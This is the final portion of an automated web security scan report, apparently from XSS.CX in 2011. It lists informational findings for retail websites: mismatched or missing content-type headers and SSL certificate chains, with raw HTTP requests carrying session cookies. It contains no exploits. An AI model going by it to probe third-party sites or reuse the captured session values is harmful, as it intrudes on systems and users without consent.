Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 01:53:56 GMT
Content-Length: 40
Content-Type: text/html;charset=ISO-8859-1

$0.00

26.47. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.toshibadirect.com
Path:	/js/coremetrics/emptyfunctions.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

Response

26.48. https://www.toshibadirect.com/td/b2c/headerAjax.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.toshibadirect.com
Path:	/td/b2c/headerAjax.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

27. Content type is not specified previous next
There are 5 instances of this issue:

https://secure.bluenile.com/favicon.ico
http://www.bluenile.com/favicon.ico
http://www.helzberg.com/
https://www.helzberg.com/account/login.do
https://www.helzberg.com/account/passwordrecovery.do

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. https://secure.bluenile.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/favicon.ico

Request

Response

27.2. http://www.bluenile.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:38 GMT
Last-Modified: Wed, 11 May 2011 17:19:04 GMT
Accept-Ranges: bytes
ETag: W/"1406-1305134344000"
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1406

..............h.......(....... ............................................................................................................................//..SS..kg.................................
...[SNIP]...

27.3. http://www.helzberg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helzberg.com
Path:	/

Request

GET / HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; s_cc=true; s_sq=mlhelzbprod%3D%2526pid%253DMy%252520Account%252520-%252520Register/Sign%252520In%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.getElementById%252528%252527mainForm%252527%252529.action%25253D%252527/account/login.do%25253Fmethod%25253Dregister%2526oidt%253D2%2526ot%253DIMAGE; fsr.a=1305542740864

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 10:46:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:46:54 GMT
Content-Length: 925
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Error Page</title>
<STYLE TYPE="text/css" MEDIA=screen>
<!--
.title {
font-family : Arial, Helvetica, san
...[SNIP]...

27.4. https://www.helzberg.com/account/login.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/account/login.do

Request

POST /account/login.do?method=register HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: https://www.helzberg.com/account/login.do?method=view
Cache-Control: max-age=0
Origin: https://www.helzberg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; s_cc=true; s_sq=mlhelzbprod%3D%2526pid%253DMy%252520Account%252520-%252520Register/Sign%252520In%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.getElementById%252528%252527mainForm%252527%252529.action%25253D%252527/account/login.do%25253Fmethod%25253Dregister%2526oidt%253D2%2526ot%253DIMAGE; fsr.a=1305542739864
Content-Length: 54

loginEmail=&loginPassword=&register.x=20&register.y=11

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 10:45:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:41 GMT
Content-Length: 925
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Error Page</title>
<STYLE TYPE="text/css" MEDIA=screen>
<!--
.title {
font-family : Arial, Helvetica, san
...[SNIP]...

27.5. https://www.helzberg.com/account/passwordrecovery.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/account/passwordrecovery.do

Request

GET /account/passwordrecovery.do?from=account HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305542733572

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 10:45:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:45:35 GMT
Content-Length: 925
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Error Page</title>
<STYLE TYPE="text/css" MEDIA=screen>
<!--
.title {
font-family : Arial, Helvetica, san
...[SNIP]...

28. SSL certificate previous
There are 18 instances of this issue:

https://ordering.ftd.com/
https://secure.bhphotovideo.com/
https://secure.bluenile.com/
https://secure.homedepot.ca/
https://secure.orientaltrading.com/
https://subscriptions.marvel.com/
https://www.acehardware.com/
https://www.armaniexchange.com/
https://www.brookstone.com/
https://www.footlocker.com/
https://www.gnc.com/
https://www.guitarcenter.com/
https://www.helzberg.com/
https://www.orderhouse.com/
https://www.petsmart.com/
https://www.redcrossstore.org/
https://www.restorationhardware.com/
https://www.toshibadirect.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

28.1. https://ordering.ftd.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	ordering.ftd.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Mon Jan 17 18:00:00 CST 2011
Valid to:	Wed Jan 18 17:59:59 CST 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

Certificate chain #4

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

28.2. https://secure.bhphotovideo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.bhphotovideo.com
Issued by:	Cybertrust SureServer Standard Validation CA
Valid from:	Wed Aug 25 21:07:25 CDT 2010
Valid to:	Thu Aug 25 21:07:25 CDT 2011

Certificate chain #1

Issued to:	Cybertrust SureServer Standard Validation CA
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Apr 04 09:18:37 CDT 2007
Valid to:	Tue Apr 04 09:18:11 CDT 2017

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

Certificate chain #3

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

28.3. https://secure.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.bluenile.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Jun 07 19:00:00 CDT 2009
Valid to:	Wed Jun 08 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

28.4. https://secure.homedepot.ca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.homedepot.ca
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.homedepot.ca,ST=Ontario
Issued by:	Akamai Subordinate CA 3
Valid from:	Thu Jan 13 14:22:01 CST 2011
Valid to:	Fri Jan 13 14:22:01 CST 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

28.5. https://secure.orientaltrading.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	secure.orientaltrading.com
Issued by:	COMODO Extended Validation Secure Server CA
Valid from:	Tue Jun 29 19:00:00 CDT 2010
Valid to:	Fri Jun 29 18:59:59 CDT 2012

Certificate chain #1

Issued to:	COMODO Extended Validation Secure Server CA
Issued by:	COMODO Certification Authority
Valid from:	Sun May 23 19:00:00 CDT 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	COMODO Certification Authority
Issued by:	AddTrust External CA Root
Valid from:	Wed Feb 10 18:00:00 CST 2010
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	AddTrust External CA Root
Issued by:	AddTrust External CA Root
Valid from:	Tue May 30 05:48:38 CDT 2000
Valid to:	Sat May 30 05:48:38 CDT 2020

28.6. https://subscriptions.marvel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	subscriptions.marvel.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Wed Oct 28 19:00:00 CDT 2009
Valid to:	Wed Dec 28 17:59:59 CST 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

28.7. https://www.acehardware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.acehardware.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sun Apr 12 21:14:55 CDT 2009
Valid to:	Fri Jul 12 21:14:55 CDT 2013

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

28.8. https://www.armaniexchange.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.armaniexchange.com,ST=New York
Issued by:	Akamai Subordinate CA 3
Valid from:	Wed Jul 14 15:31:08 CDT 2010
Valid to:	Thu Jul 14 15:31:08 CDT 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

28.9. https://www.brookstone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.brookstone.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Mon May 03 19:00:00 CDT 2010
Valid to:	Sat Jun 02 18:59:59 CDT 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

28.10. https://www.footlocker.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.footlocker.com
Issued by:	USERTrust Legacy Secure Server CA
Valid from:	Thu Mar 17 19:00:00 CDT 2011
Valid to:	Sat Jul 16 18:59:59 CDT 2011

Certificate chain #1

Issued to:	USERTrust Legacy Secure Server CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Thu Nov 26 14:33:13 CST 2009
Valid to:	Sat Oct 31 23:00:00 CDT 2015

Certificate chain #2

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

28.11. https://www.gnc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.gnc.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Fri Oct 09 05:04:37 CDT 2009
Valid to:	Wed Jan 08 17:00:54 CST 2014

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

28.12. https://www.guitarcenter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.guitarcenter.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue Aug 31 19:00:00 CDT 2010
Valid to:	Thu Sep 15 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

28.13. https://www.helzberg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.helzberg.com,ST=PENNSYLVANIA
Issued by:	Akamai Subordinate CA 3
Valid from:	Wed Apr 13 11:44:05 CDT 2011
Valid to:	Fri Apr 13 11:44:05 CDT 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

28.14. https://www.orderhouse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.orderhouse.com
Issued by:	Network Solutions Certificate Authority
Valid from:	Wed Mar 16 19:00:00 CDT 2011
Valid to:	Sun Mar 18 18:59:59 CDT 2012

Certificate chain #1

Issued to:	Network Solutions Certificate Authority
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Apr 09 19:00:00 CDT 2006
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 13:10:42 CDT 1999
Valid to:	Tue Jul 09 13:19:22 CDT 2019

28.15. https://www.petsmart.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.petsmart.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Fri Jan 08 07:50:30 CST 2010
Valid to:	Mon Mar 10 01:01:11 CDT 2014

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

28.16. https://www.redcrossstore.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.redcrossstore.org
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.redcrossstore.org
Issued by:	Network Solutions Certificate Authority
Valid from:	Tue Nov 16 18:00:00 CST 2010
Valid to:	Sun Dec 04 17:59:59 CST 2011

Certificate chain #1

Issued to:	Network Solutions Certificate Authority
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Apr 09 19:00:00 CDT 2006
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 13:10:42 CDT 1999
Valid to:	Tue Jul 09 13:19:22 CDT 2019

28.17. https://www.restorationhardware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.restorationhardware.com,ST=CA
Issued by:	Akamai Subordinate CA 3
Valid from:	Mon Dec 20 11:43:56 CST 2010
Valid to:	Tue Dec 20 11:43:56 CST 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

28.18. https://www.toshibadirect.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.toshibadirect.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Wed Jan 19 12:24:46 CST 2011
Valid to:	Sun Jan 19 12:24:46 CST 2014

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	http://www.valicert.com/
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 19:19:54 CDT 1999
Valid to:	Tue Jun 25 19:19:54 CDT 2019

Report generated by XSS.CX at Mon May 16 06:15:01 CDT 2011.